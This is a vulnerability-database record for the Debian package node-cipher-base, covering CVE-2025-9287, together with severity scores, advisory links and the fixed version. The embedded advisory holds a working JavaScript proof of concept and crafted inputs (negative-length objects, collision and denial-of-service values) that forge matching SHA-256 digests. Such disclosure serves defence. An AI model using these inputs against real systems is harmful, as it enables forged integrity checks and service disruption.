Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/node-cipher-base@1.0.4-3
Typedeb
Namespacedebian
Namenode-cipher-base
Version1.0.4-3
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version1.0.4-6+deb12u1
Latest_non_vulnerable_version1.0.4-6+deb12u1
Affected_by_vulnerabilities
0
url VCID-tt31-4d54-k7cz
vulnerability_id VCID-tt31-4d54-k7cz
summary
cipher-base is missing type checks, leading to hash rewind and passing on crafted data
### Summary

This affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package
Also affects `create-hmac` and other packages

Node.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView.

Missing input type checks (in npm `create-hash` polyfill of Node.js `createHash`) can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

### Details

See PoC

### PoC
```js
const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = createHash('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
```

Output:
```
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe
```

This works with:
```js
const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])
```

But there are other types of input which lead to unchecked results

### Impact

1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`
    This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)
4. DoS on `{length:'1e99'}`
5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like [GHSA-vjh7-7g9h-fjfh](https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh))
6. Also, other typed arrays results are invalid, e.g. returned hash of `new Uint16Array(5)` is the same as `new Uint8Array(5)`, not `new Uint16Array(10)` as it should have been (and is in Node.js `crypto`) -- same for arrays with values non-zero, their hashes are just truncated to `%256` instead of converted to correct bytelength
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9287.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9287.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-9287
reference_id
reference_type
scores
0
value 0.00106
scoring_system epss
scoring_elements 0.28565
published_at 2026-04-21T12:55:00Z
1
value 0.00106
scoring_system epss
scoring_elements 0.28615
published_at 2026-04-18T12:55:00Z
2
value 0.00106
scoring_system epss
scoring_elements 0.2864
published_at 2026-04-16T12:55:00Z
3
value 0.00106
scoring_system epss
scoring_elements 0.2862
published_at 2026-04-13T12:55:00Z
4
value 0.00106
scoring_system epss
scoring_elements 0.28668
published_at 2026-04-12T12:55:00Z
5
value 0.00106
scoring_system epss
scoring_elements 0.28798
published_at 2026-04-04T12:55:00Z
6
value 0.00106
scoring_system epss
scoring_elements 0.28605
published_at 2026-04-07T12:55:00Z
7
value 0.00106
scoring_system epss
scoring_elements 0.2875
published_at 2026-04-02T12:55:00Z
8
value 0.00106
scoring_system epss
scoring_elements 0.28711
published_at 2026-04-09T12:55:00Z
9
value 0.00106
scoring_system epss
scoring_elements 0.28713
published_at 2026-04-11T12:55:00Z
10
value 0.00106
scoring_system epss
scoring_elements 0.2867
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-9287
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9287
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9287
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/browserify/cipher-base
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/browserify/cipher-base
5
reference_url https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294
6
reference_url https://github.com/browserify/cipher-base/pull/23
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:49Z/
url https://github.com/browserify/cipher-base/pull/23
7
reference_url https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:49Z/
url https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc
8
reference_url https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-9287
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-9287
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111772
reference_id 1111772
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111772
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2389932
reference_id 2389932
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2389932
12
reference_url https://github.com/advisories/GHSA-cpq7-6gpm-g9rc
reference_id GHSA-cpq7-6gpm-g9rc
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cpq7-6gpm-g9rc
13
reference_url https://access.redhat.com/errata/RHSA-2025:14767
reference_id RHSA-2025:14767
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:14767
14
reference_url https://access.redhat.com/errata/RHSA-2025:15847
reference_id RHSA-2025:15847
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:15847
15
reference_url https://access.redhat.com/errata/RHSA-2025:16020
reference_id RHSA-2025:16020
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:16020
16
reference_url https://access.redhat.com/errata/RHSA-2025:18278
reference_id RHSA-2025:18278
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:18278
17
reference_url https://access.redhat.com/errata/RHSA-2025:18744
reference_id RHSA-2025:18744
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:18744
18
reference_url https://access.redhat.com/errata/RHSA-2025:22905
reference_id RHSA-2025:22905
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:22905
19
reference_url https://access.redhat.com/errata/RHSA-2026:3710
reference_id RHSA-2026:3710
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3710
20
reference_url https://access.redhat.com/errata/RHSA-2026:3712
reference_id RHSA-2026:3712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3712
21
reference_url https://usn.ubuntu.com/7746-1/
reference_id USN-7746-1
reference_type
scores
url https://usn.ubuntu.com/7746-1/
fixed_packages
0
url pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1
purl pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb12u1
aliases CVE-2025-9287, GHSA-cpq7-6gpm-g9rc
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tt31-4d54-k7cz
Fixing_vulnerabilities
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-3